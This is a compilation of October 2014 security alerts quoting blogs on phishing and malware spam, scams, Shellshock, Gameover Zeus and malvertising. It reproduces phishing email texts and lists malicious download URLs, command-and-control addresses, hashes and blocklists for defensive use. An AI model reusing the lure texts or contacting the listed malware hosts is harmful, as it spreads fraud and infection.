6 Oct 2014 - "'invoice copy (waiting for your confirmation)' pretending to come from Tiffany & Co. <j.parker@ tiffany .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Kindly open to see export License and payment invoice attached, meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if there is any problem.
Thanks J.parker
Tiffany & Co.

6 October 2014: Tiffany order details 06-10-2014.zip:
Extracts to: Tiffany order details 06-10-2014.exe
Current Virus total detections: 6/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f1b13062f764e0e5643da3e74753d912d596cc362def9142263cea0e686bba80/analysis/1412597423/

:fear: :mad:

FYI...

DHL phish ...
- http://blog.dynamoo.com/2014/10/dhl-themed-phish-goes-to-lot-of-effort.html
7 Oct 2014 - "This DHL-themed phish is trying to harvest email credentials, but instead of just spamming out a link, it spams out a PDF file with the link embedded in it.
Screenshot: https://3.bp.blogspot.com/-J8JkllU3g1M/VDOdr9sAc5I/AAAAAAAAFyQ/VE4P9MxOkGY/s1600/dhl.png

Look closely at the blurb at the bottom and it confuses DHL with UPS, but who reads that? Attached is a non-malicious PDF file DHL (1).pdf which contains a link to the phishing site.
Screenshot2: https://2.bp.blogspot.com/-smrDiPpKzJY/VDOeWRTX8uI/AAAAAAAAFyY/oucaylYyHdQ/s1600/dhl2.png

... a neat trick to use PDF files in this way as a lot of spam filters and anti-phishing tools won't spot it. The link in the PDF goes to 37.61.235.199 /~zantest/doc1/dhlweb0002/webshipping_dhl_com_members_modulekey_displaycountrylist_id5482210003804452/DHL/index .htm where it has a rather less professional looking webpage that is phishing for general email addresses rather than DHL credentials.
Screenshot3: https://4.bp.blogspot.com/-BDpUiMlKaEk/VDOfv4G-CmI/AAAAAAAAFyk/sS4m_BsPR1I/s1600/dhl3.png

With the grotty graphics and injudicious use of Comic Sans, it's hard to see how this would fool anyone into turning over their credentials.. but presumably they manage to harvest enough usernames and passwords to make it worthwhile."

37.61.235.199: https://www.virustotal.com/en/ip-address/37.61.235.199/information/
___

Fake Outlook voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/microsoft-outlook-received-voice-mail-fake-wav-malware/
7 Oct 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook <no-reply@ random domain address > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE0003589463733.wav
Caller-Id: 3589463733
Message-Id: ZU1I9W
Email-Id: montag @ myonlinesecurity .co .uk
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server

7 October 2014: VOICE3589463733.wav.zip: Extracts to: VOICE000358276655116307.exe
Current Virus total detections: 10/55* . This You have received a voice mail is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound ) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected...*
* https://www.virustotal.com/en/file/fb286c8c0c1bbf7c89be27016a7fce614515fa47e1e5219618b15ead6d0cf544/analysis/1412673429/
___

Vishing ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/here-vishy-vishy/
Oct 7, 2014 - "Voice phishing – Vishing, for short – has been around for a long time and is all about using the phone and social engineering to grab the information required...
Ref: http://www.edinburghnews.scotsman.com/news/crime/vishing-scammers-con-woman-out-of-80-000-1-3540027
...
- http://www.telegraph.co.uk/finance/personalfinance/bank-accounts/10882193/I-lost-17500-in-vishing-scam-because-I-didnt-watch-The-One-Show.html
Vishing can start with an email or a text but the ultimate goal is to get you on the other end of a telephone line. From there, the -scammers- will go about harvesting your data by pretending to be your bank and asking for card... It’s important to remember there are many ways to fall foul of a telephone scam than “just” Vishing, and you can take a look at some more examples in a roundup by the FTC*..."
* http://www.consumer.ftc.gov/articles/0076-phone-scams
___

419 SCAM - Breast Cancer Awareness Donation
- http://myonlinesecurity.co.uk/ongoing-breast-cancer-awareness-donation-program-419-scam/
7 Oct 2014 - "This rather evil and nasty 419 scam saying Ongoing Breast Cancer Awareness Donation Program pretends to come from Neil trotter Cancer Foundation <neil–trotter@ [redacted] .com>... The email looks like this with pictures:

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Ongoing-Breast-Cancer-Awareness-Donation-Program.png

Obviously it is a total -scam- and you should -not- reply to any email received that is like this."
___

Fake inTuit/Apple malicious SPAM
- https://security.intuit.com/alert.php?a=111
Oct 7, 2014 - "People are receiving fake emails with the title 'Your receipt No.557911643385'. These mails are coming from applecenter@ security .intuit .com, which is -not- a legitimate email address (spoofed). Below is a copy of the email people are receiving:

Apple iTunes
October 07, 2014
Billed To:
Order ID: KT85GMQ55L
Receipt Date: 10/07/2014
Order Total: $161.98
Billed To: Store Credit
Item Artist
August: Osage County John Wells
My Man Is a Loser Mike Young
Type Unit Price
Film Rental(HD) $67.99
Film Rental(HD) $93.99
Order Total
$161.98
Issues with this transaction?
If you haven't authorized this transaction, click the link below to get full refund...
2014 Apple Online Support

This is the end of the -fake- email.
Steps to Take Now:
- Do not open the attachment in the email.
- Do not -click- on any -links- in the email..
- Delete the email.
___

Yahoo Sports servers - malicious code
- http://www.theinquirer.net/inquirer/news/2374191/yahoo-shellshock-not-to-blame-for-server-security-flaw
Oct 7 2014 - "... there was some kind of security breach on its servers, but took pains to clear up reports which suggested that Shellshock was the reason. Yahoo's chief information security officer, Alex Stamos, took to the net to counter comments that began at Yahoo*..."
* https://news.ycombinator.com/item?id=8418809
Oct 6 2014 - "... I’m the CISO of Yahoo and I wanted to clear up some misconceptions. Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact -not- affected by Shellshock. Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs. Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found -no- evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been -fixed- and we have added this pattern to our CI/CD code scanners to catch future issues... the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: -not- Shellshock... just because exploit code works doesn’t mean it triggered the bug you expected!... Yahoo takes external security reports seriously and we strive to respond immediately to credible tips... our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation..."
___

Adobe - spying on e-book readers
- http://www.theinquirer.net/inquirer/news/2374349/adobe-accused-of-spying-on-e-book-readers
Oct 7 2014

- http://arstechnica.com/security/2014/10/adobes-e-book-reader-sends-your-reading-logs-back-to-adobe-in-plain-text/
Oct 7 2014

- http://the-digital-reader.com/2014/10/06/adobe-spying-users-collecting-data-ebook-libraries/

:mad: :fear:

FYI...

Fake Business proposal - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/dear-important-business-proposal/
Oct 8, 2014 - "Carter Ham, a retired four-star United States Army general, is supposedly on Linkedin—and he wants you (to read his personal message)... clearly a scheme to phish for information from unwary recipients. Below is a screenshot of the sender’s online profile:
General Carter Ham on Linkedin. Not!:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/linkedin-gch.png
... As far as the legitimacy of the profile goes, the blurb from the Summary section was copied and pasted from this Wikipedia page*. We don’t know if the former general is indeed on the said social networking site (in case you’re wondering). What we -do- know is that if you receive a message similar to the one above asking for personal information from you in exchange for a slice of the cash s/he wanted to move, it’s best to ignore the message and check with this contact if his/her account has been hacked or not."
* http://en.wikipedia.org/wiki/Carter_Ham
___

Fake Lloyds and NatWest SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-lloyds-important.html
8 Oct 2014 - "... familiar pattern to this malware-laden spam, but with an updated payload from before:
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 8 October 2014 11:09
Subject: Important - Commercial Documents
Important account documents
Reference: C437
Case number: 66324010
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...

From: NatWest [secure.message@ natwest .com]
Date: 8 October 2014 10:29
Subject: You have a new Secure Message - file-2620
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...

The link in the email runs through a script which will attempt to download a ZIP file pdf-to-view_864129_pdf.zip onto the target machine which in turn contains a malicious executable pdf-to-view_864129_pdf.exe which has a VirusTotal detection rate of 6/53*. The Malwr report indicates that the malware phones home to the following locations which are worth -blocking- especially 94.75.233.13 (Leaseweb, Netherlands) which looks like a C&C server."
94.75.233.13 :37400/0810uk1/HOME/0/51-SP3/0/
94.75.233.13 :37400/0810uk1/HOME/1/0/0/
94.75.233.13 :37400/0810uk1/HOME/41/5/1/
cemotrans .com/seo/0810uk1.soa
* https://www.virustotal.com/en/file/3c04500e3adf84f62f6428f5d739d5f877e81071bcdfff9d186f120533ffe0df/analysis/1412773720/
... Behavioural information
DNS requests
cemotrans .com (82.98.157.8)
TCP connections
94.75.233.13: https://www.virustotal.com/en/ip-address/94.75.233.13/information/
82.98.157.8: https://www.virustotal.com/en/ip-address/82.98.157.8/information/
___

Fake photo SPAM – malware
- http://myonlinesecurity.co.uk/photo-8-oct-2014-malware/
8 Oct 2014 - "'photo 8 oct 2014' pretending to come from various @yahoo.co.uk addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very plain and terse with the subject of photo 8 oct 2014 and the body simply says:

Sent from my iPhone

8 October 2014: Img-0034.zip: Extracts to: Img-0034.jpeg
Current Virus total detections: 2/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/272804c706382e8a994bce09d36f0d620ba97dde68c2b590f26d442f984ce773/analysis/1412768396/
___

Fake Invoice Balance SPAM - word doc malware
- http://myonlinesecurity.co.uk/invoice-balance-fake-word-doc-malware/
8 Oct 2014 - "'Invoice Balance' pretending to come from various Hotmail .co.uk addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
HELLO,
work-life balance.
Thanks
---

8 October 2014: Invoice_Balance_september_doc.zip: Extracts to: Invoice_Balance_september_doc.exe
Current Virus total detections: 2/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/272804c706382e8a994bce09d36f0d620ba97dde68c2b590f26d442f984ce773/analysis/1412766448/
___

Australian Taxation Office Refund Spam
- http://threattrack.tumblr.com/post/99483080723/australian-taxation-office-refund-spam
Oct 8, 2014 - "Subjects Seen:
Australian Taxation Office - Refund Notification
Typical e-mail details:
IMPORTANT NOTIFICATION
Australian Taxation Office - 08/10/2014
After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 2398.43 AUD.
For more details please follow the steps bellow :
- Right-click the link on the attachment name, and select Save Link As, Save Target As or a similar option provided.
- Select the location into which you want to download the file and choose Save.
- Unzip the attached file.
Ingrid Warren,
Tax Refund Department
Australian Taxation Office

Malicious File Name and MD5:
ATO_TAX_419771083.zip (EBE4991F3C1C4B00E3E8662577139F3E)
ATO_TAX_419771083.pdf.scr (A89CD5ACAB413D308A565B21B481A2F8)

Tagged: australian taxation office, Upatre, ATO

:fear: :mad:

FYI...

Nuclear EK active on 178.79.182.106
- http://blog.dynamoo.com/2014/10/nuclear-ek-active-on-17879182106.html
9 Oct 2014 - "It looks like the Nuclear exploit kit is active on 178.79.182.106 (Linode, UK), using hijacked subdomains of legitimate domains using AFRAID.ORG nameservers. I can see the following sites active on that IP:
fuhloizle .tryzub-it .co.uk
fuhloizle .pgaof39 .com
fuhloizle .cusssa .org
"fuhloizle" is a pretty distinctive search string to look for in your logs. It looks like the bad sites might be down at the moment (or the kit is hardened against analysis), but blocking this IP address as a precaution might be a good idea."
178.79.182.106: https://www.virustotal.com/en/ip-address/178.79.182.106/information/
___

chinaregistry .org.cn domain SCAM
- http://blog.dynamoo.com/2014/10/chinaregistryorgcn-domain-scam.html
9 Oct 2014 - "This is an old scam that can safely be ignored.
From: Henry Liu [henry.liu@ chinaregistry .org.cn]
Date: 9 October 2014 07:53
Subject: [redacted] domain and keyword in CN
(Please forward this to your CEO, because this is urgent. Thanks)
We are a Network Service Company which is the domain name registration center in Shanghai, China. On Oct 7, 2014, we received an application from Huaya Holdings Ltd requested "[redacted]" as their internet keyword and China (CN) domain names. But after checking it, we find this name conflict with your company name or trademark. In order to deal with this matter better, it's necessary to send email to you and confirm whether this company is your distributor or business partner in China?Kind regards
Henry Liu
General Manager
China Registry (Headquarters)
3002, Nanhai Building, No. 854 Nandan Road,
Xuhui District, Shanghai, China ...

Nobody is trying to register your domain name, this is simply a long-running scam aimed at getting you to spend too much money on something that you don't need. And I strongly recommend that you don't forward junk email like this to your CEO either..."
(Short video at the dynamoo URL above.)
___

Bash Bug saga continues: Shellshock Exploit via DHCP
- http://blog.trendmicro.com/trendlabs-security-intelligence/bash-bug-saga-continues-shellshock-exploit-via-dhcp/
Oct 8, 2014 - "The Bash vulnerability known as Shellshock can be exploited via several attack surfaces including web applications, DHCP, SIP, and SMTP. With multiple proofs of concept (including -Metasploit- code) available in the public domain, this vulnerability is being heavily exploited. Most discussion of Shellshock attacks have focused on attacks on web apps. There has been relatively little discussion on on other surfaces like DHCP, SMTP, and CUPS... techniques could be used by an attacker to compromise more machines within the network. Dynamic Host Configuration Protocol (DHCP) is a protocol used to dynamically distribute and assign network configuration settings, such as IP addresses. An attacker can configure a compromised DHCP server or create a rogue DHCP server to send -malicious- information to the DHCP client. Either technique means that the attacker has already compromised the network using other attack vectors... Various techniques can be used to to exploit Shellshock over DHCP..."
(More detail at the trendmicro URL above.)

:mad: :fear:

FYI...

Fake fax, 'Secure msg' SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-youve-received-new-fax-you.html
10 Oct 2014 - "A pair of malware spams this morning, both with the same payload:

"You've received a new fax"
From: Fax [fax@ victimdomain .com]
Date: 10 October 2014 11:34
Subject: You've received a new fax
New fax at SCAN7097324 from EPSON by https ://victimdomain .com
Scan date: Fri, 10 Oct 2014 18:34:56 +0800
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.)

"You have received a new secure message from BankLine"
From: Bankline [secure.message@ bankline .com]
Date: 10 October 2014 10:29
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it...

The malware downloads a file document_73128_91898_pdf.zip from the target site that contains a malicious executable document_73128_91898_pdf.exe which has a VirusTotal detection rate of 4/54*. According to the ThreatExpert report... the malware communicates with the following URLs which are probably worth -blocking- or monitoring"
94.75.233.13 /1010uk1/NODE01/41/5/1/
94.75.233.13 /private/sandbox_status.php
94.75.233.13 /1010uk1/NODE01/0/51-SP3/0/
94.75.233.13 /1010uk1/NODE01/1/0/0/
beanztech .com/beanz/1010uk1.rtf
* https://www.virustotal.com/en/file/5c3643b5cf2c5a392a55589e5025bfe659149a0b5da662ad8989f25005ba28cc/analysis/1412937674/

94.75.233.13: https://www.virustotal.com/en/ip-address/94.75.233.13/information/
___

Gameover Zeus... at Vogue .com
- http://www.threattracksecurity.com/it-blog/gameover-zeus-accessorizes-vogue-com/
Oct 10, 2014 - "Our researchers this week spotted a Gameover Zeus sample receiving commands to download Zemot from hxxp ://media .vogue[dot]com/voguepedia/extensions/dimage/cache/1zX67.exe
... Others have spotted Gameover Zeus reaching out to a compromised vogue.com domain to download Zemot – a family of Trojan downloaders – which according to Microsoft is usually distributed via the Kuluoz botnet*. Behavior worth noting in this Gameover Zeus sample upon execution is that it crawled a list of DGA domains... this Gameover Zeus sample seems to be an updated variant targeting -financial- processes we’ve not yet seen in previous reports... According to URLquery.net**, there were several malicious files being served on the Vogue domain, which have been removed. 1zX67.exe was an active threat as late as yesterday evening..."
* http://blogs.technet.com/b/mmpc/archive/2014/09/09/msrt-september-2014-zemot.aspx

** http://www.urlquery.net/report.php?id=1412718766058
___

Mobile ads use malware tricks to get installs
- https://blog.malwarebytes.org/mobile-2/2014/10/mobile-advertisers-use-malware-tricks-to-get-installs/
Oct 10, 2014 - "Deceptive advertising targeting Android users is an effective way of getting malware installed. Now some advertisers are using it to get paid through pay-per-install schemes... we’ve been seeing more and more of this, but this time advertisers are using these banner and pop-up ads to get installs of more trustworthy apps like Dolphin browser. The messages are less scary than the virus related ones, but they are still meant to get your attention. It seems a bit backwards but it’s all about making money, ad developers are just as greedy as malware authors–just not as malicious. Anytime during your mobile browsing experience, if you encounter one of these pop-ups or similar just ignore and it’d probably be best to -leave- the site displaying them:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ads06.jpg?w=564
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ads05.jpg?w=564
Don’t fall for these messages, Android won’t use web pop-ups to inform you of updates, they’ll be handled through a system notification and apps will update via Google Play Services. Using a tool like Adblock Plus which will filter URL traffic can help prevent most of these ads. Adblock Plus is a third-party app, will require a bit of configuration* and only blocks WiFi traffic.
* https://adblockplus.org/en/android-config
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ad11.jpg
On iOS you won’t see the warning pop-ups, instead you’ll immediately be -redirected- to the peddled apps App Store page. If, by chance, you’re interested in installing one of these apps go -directly- to your trusted source for apps. By following the redirect you might be going down another rabbit hole and end up getting -malware- instead of the original."
___

October 2014 Web Server Survey
- http://news.netcraft.com/archives/2014/10/10/october-2014-web-server-survey.html
10 Oct 2014 - "In the October 2014 survey we received responses from 1,028,932,208 sites, which is nearly six million more than last month. Microsoft lost the lead to Apache this month, as the two giants continue to battle closely for the largest share of all websites. Apache gained nearly 30 million sites, while Microsoft lost 22 million, causing Apache to be thrust back into the lead by more than 36 million sites. In total, 385 million sites are now powered by Apache, giving it a 37.45% share of the market. A significant contributor to this change was the expiry of domains previously used for link farming on Microsoft IIS servers. The domains used by these link farms were acquired and the sites are now hosted on Apache servers..."
(Charts available at the URL above.)

:fear: :mad:

FYI...

Fake Amazon SPAM - Word doc malware
- http://myonlinesecurity.co.uk/amazon-co-uk-order-word-doc-malware/
13 Oct 2014 - "'Your Amazon.co.uk order #} random letters and numbers' pretending to come from AMAZON .CO.UK <order@ amazon .co.uk> and all being sent to 1122@ eddfg .com with a bcc to your email address is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/amazon_order_Oct.png

13 October 2014 : 575-3010892-0992746.doc Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is -NEVER- open any attachment to an email, unless you are expecting it... The best way is to just delete the unexpected zip and not risk any infection."
* https://www.virustotal.com/en/file/3bbcdea4e4f6427296f8b57a77ee70967b9a91a703d69306296c78e1e92fe318/analysis/1413181748/

- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-spam-with.html
13 Oct 2014
___

Fake BankLine SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-you-have-received-new.html
13 Oct 2014 - "A couple of unimaginative spam emails leading to a malicious payload.

You have received a new secure message from BankLine
From: Bankline [secure.message@ bankline .com]
Date: 13 October 2014 12:48
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it...

You've received a new fax
From: Fax [fax@ victimdomain .com]
Date: 13 October 2014 13:07
Subject: You've received a new fax
New fax at SCAN2166561 from EPSON by https ://victimdomain .com
Scan date: Mon, 13 Oct 2014 20:07:31 +0800
Number of pages: 2
Resolution: 400x400 DPI
(Dropbox Drive is a file hosting service operated by Google, Inc.)

Clicking the link downloads document_312_872_pdf.zip from the target site which in turn contains a malicious executable document_312_872_pdf.exe which has a VirusTotal detection rate of 3/54*... Also dropped are a couple of executables, egdil.exe (VT 2/54**, Malwr report) and twoko.exe (VT 6/55***, Malwr report).
Recommended blocklist:
94.75.233.13
144.76.220.116
85.25.152.238
carcomputer .co.uk
phyccess .com
hotelnuovo .com
wirelesssolutionsny .com
isc-libya .com "
* https://www.virustotal.com/en/file/a598ddc9af8438ac29a43a33c8dae09a996d77a5ae10331d7a02ea1df1e0d339/analysis/1413208781/

** https://www.virustotal.com/en/file/35274a3ffbe34b8b17ccdc147cd721c5748d39c6a143b0e4b67812767a4d197b/analysis/1413210259/

*** https://www.virustotal.com/en/file/e464613eaa2aec9fee27a4e3bb91219ca2c5cb38a41217604d6cde292f416445/analysis/1413210280/
___

Barclaycard phishing ...
- http://myonlinesecurity.co.uk/barclaycard-phishing-attempts/
13 Oct 2014 - "We are seeing quite a few Barclaycard phishing attempts today trying to get your Barclaycard details. These are not very well crafted and look nothing like any genuine Barclaycard emails. Do -not- click any links in these emails. Hover your mouse over the links and you will see a web address that isn’t Barclaycard. Immediately delete the email and the safest way to make sure that it isn’t a genuine email from Barclaycard is to type the Barclaycard web address in your browser. and then log in to the account that way...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/barclaycard_phishing-email.png

... using what look like they are hijacked/compromised subdomains of a real website. All of them use a random subdomain and then the website name and then /clients/? The site looks like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/barclaycard_phishing-site.png
Following the link in this Barclaycard or other spoofed emails takes you to a website that looks exactly like the real Barclaycard site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Barclaycard account, but also your Bank Account, and potentially your email details and webspace (if you have it). They want enough information to completely impersonate you and your identity not only in cyberspace but in real life..."
___

Fake Bank application SPAM - malware
- http://www.hoax-slayer.com/fnbo-account-application-malware-email.shtml
Oct 13 2014 - "Email purporting to be from First National Bank of Omaha (FNBO) claims that your account application has been received and invites you to open an -attached- file to view documents about your application:
Re: Applicant #9908541042
Hello,
Your application for an FNBO Direct account has been received. As an FNBO Direct customer, not only will you receive an exceptional interest rate, you can be confident your accounts are held by a bank established in values of trust, integrity, and security.
Please find in the attached document information concerning your application.
Copyright (c) 2014 FNBO Direct, a division of First National Bank of Omaha. All Rights Reserved. Deposit Accounts are offered by First National Bank of Omaha,
Member FDIC. Deposits are insured to the maximum permitted by law.
P.O. Box 3707, Omaha, NE 68103-0707
For information on FNBO Direct's privacy policy, please visit [Link removed]
Email ID: A0963.6
(Email included attached file with the name: 'FNBO_Direct_application_9908541042.zip')

According to this email, which claims to be from First National Bank of Omaha (FNBO), your application for an FNBO Direct account has been received. The message advises that information about your application is contained in an -attached- document... it masquerades as a seemingly legitimate business message and uses the name of a real company... the attached .zip file... contains a .exe file. Clicking the .exe file would install a trojan on your computer... do -not- open any attachments or click any links that it contains. You can report fraudulent FNBO emails via the reporting address on the bank's website*."
* https://www.fnbodirect.com/site/security-center/email-fraud.fhtml
___

Fake FedEx SPAM
- http://blog.mxlab.eu/2014/10/12/fake-email-your-payment-invoice-slip-from-fedex-contains-trojan/
Oct 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your Payment Invoice Slip”. This email is send from the -spoofed- address “info@ ukboxingstore .co.uk” and has the following body:
Dear customer.
A parcel was sent to your home address.
And it will arrive within 3 business day.
More information and the tracking number are attached in the document.
Please do not respond to this message. This email was sent from an unattended mailbox.
This report was generated at approximately GMT on 06/10/2014.
To learn more about FedEx Express, please visit our website at fedex.com.
All weights are estimated.
To track the latest status of your shipment, View on the tracking number on the attached document
This tracking update has been sent to you by FedEx on the behalf of the Request or noted above.
FedEx does not validate the authenticity of the requestor and does not validate,
guarantee or warrant the authenticity of the request, the requestor’s message, or the accuracy of this tracking update...
Thank you for your business.
FedEx Customer Service

The attached ZIP file has the name FEDEX SHIPPING NOTIFICATION (1).zip and contains the 396 kB large file XXXX.exe. The trojan is known as TR/Dropper.Gen8, a variant of Win32/Injector.BNJA, HB_Ispi or Win32:Malware-gen. At the time of writing, 5 of the 55 AV engines did detect the trojan at VirusTotal*..."
* https://www.virustotal.com/en/file/7ffd0d31de67f7ece1bf472959078fda55a8091b9487e55c9a3579d8f55a68b1/analysis/1413096741/

:mad: :fear:

FYI...

Fake DOC attachment SPAM - malware
- http://blog.dynamoo.com/2014/10/to-view-your-document-please-open.html
14 Oct 2014 - "This spam comes with a malicious DOC attachment:

From: Anna [ºžô õö?ǯ#-øß {qYrÝsØ l½:ž±þ EiÉ91¤É¤y$e| p‹äŒís' ÀQtÃ#7 þ–¿åoù[þ–¿åoù[þ–¿åoù[þ–¿åÿ7 å{˜x|%S;ÖUñpbSË‘ý§B§i…¾«¿¨` Òf ¶ò [no-reply@ bostonqatar .net]
Date: 14 October 2014 11:09
Subject: Your document
To view your document, please open attachment.

The "From" field in the samples I have seen seems to be a random collection of characters. The DOC attachment is also randomly named in the format document_9639245.doc. This word document contains a malicious macro [pastebin] which downloads an additional component from pro-pose-photography .co.uk/fair/1.exe. The DOC file has a VirusTotal detection rate of 0/55* and the EXE file is just 2/54** ... UPDATE: among other things the malware drops the executable pefe.exe with a detection rate of 3/55***..."
* https://www.virustotal.com/en-gb/file/38e14668c5676fd53234abc8128ba16b2f5b19ccadaa6dda75c3a2bf9480d285/analysis/1413281775/

** https://www.virustotal.com/en-gb/file/9f202cf5e15101c5a7e05280ad4dc86092b4036dcbbd8dd144e58c4115638e75/analysis/1413283670/

*** https://www.virustotal.com/en-gb/file/c9ae7f694229861dd05492bd532980f2504c3bc3ce58fd6fad71c44cb053d643/analysis/1413287366/

- http://myonlinesecurity.co.uk/document-word-doc-malware/
14 Oct 2014 - "... The email is very plain, simple and terse and just says:

To view your document, please open attachment.

14 October 2014: document_1720781.doc Current Virus total detections: 0/55* ..."
* https://www.virustotal.com/en/file/38e14668c5676fd53234abc8128ba16b2f5b19ccadaa6dda75c3a2bf9480d285/analysis/1413281933/
___

Fake Sales Order SPAM - word doc malware
- http://myonlinesecurity.co.uk/sales-order-number-son1410-000183-fake-word-doc-malware/
14 Oct 2014 - "'Sales Order Number SON1410-000183' pretending to come from mail@ firwood .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
<html>
<body bgcolor=”#FFFFFF”>
<table width=”750″ border=”0″>
<tr>
<td>
<font face=”verdana” size=”2″></font>
<br><br>
<font face=”verdana” size=”2″>Please find the attached document a summary
of which is below:</font>
</td>
</tr>
</table>
<table width=”750″ border=”0″> ...
</table>
<font face=”verdana” size=”2″>Regards </br></br><B>Firwood Paints Ltd
</B></br>Oakenbottom Road </br>Bolton BL2 6DP England </br></br>Tel +44
(0)1204 525231 </br>Fax +44 (0)1204 362522 </br>e mail mail@ firwood .co.uk
</br></font>
</body>
</html>
Automated mail message produced by DbMail.
Registered to X3 – Sage North America, License EDM2013051.
This message has been scanned for viruses by BlackSpider MailControl ...

14 October 2014: Extracts to: SON141000-000183.pdf.exe
Current Virus total detections: 13/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1fd1e3787b4982b6029ebd9859d6aff3bd313903a2322c29a80bbd105a5651ac/analysis/1413274440/
___

YouTube Ads lead to Exploit Kits ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/youtube-ads-lead-to-exploit-kits-hit-us-victims/
Oct 14, 2014 - "Malicious ads are a common method of sending users to sites that contain malicious code. Recently, however, these ads have showed up on a new attack platform: YouTube. Over the past few months, we have been monitoring a malicious campaign that used malicious ads to direct users to various malicious sites. Users in the United States have been affected almost exclusively, with more than 113,000 victims in the United States alone over a 30-day period.
Countries affected by this malicious ad campaign:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/malad.jpg
Recently, we saw that this campaign was showing up in ads via YouTube as well. This was a worrying development: not only were malicious ads showing up on YouTube, they were on videos with more than 11 million views – in particular, a music video uploaded by a high-profile record label. The ads we’ve observed do not -directly- lead to malicious sites from YouTube. Instead, the traffic passes through two advertising sites, suggesting that the cybercriminals behind this campaign bought their traffic from legitimate ad providers. In order to make their activity look legitimate, the attackers used the -modified- DNS information of a Polish government site. The attackers did not compromise the actual site; instead they were able to change the DNS information by adding subdomains that lead to their own servers. (How they were able to do this is unclear.) The traffic passes through two -redirection- servers (located in the Netherlands) before ending up at the malicious server, located in the United States. The exploit kit used in this attack was the Sweet Orange exploit kit. Sweet Orange is known for using four vulnerabilities, namely:
CVE-2013-2460 – Java
CVE-2013-2551 – Internet Explorer
CVE-2014-0515 - Flash
CVE-2014-0322 – Internet Explorer
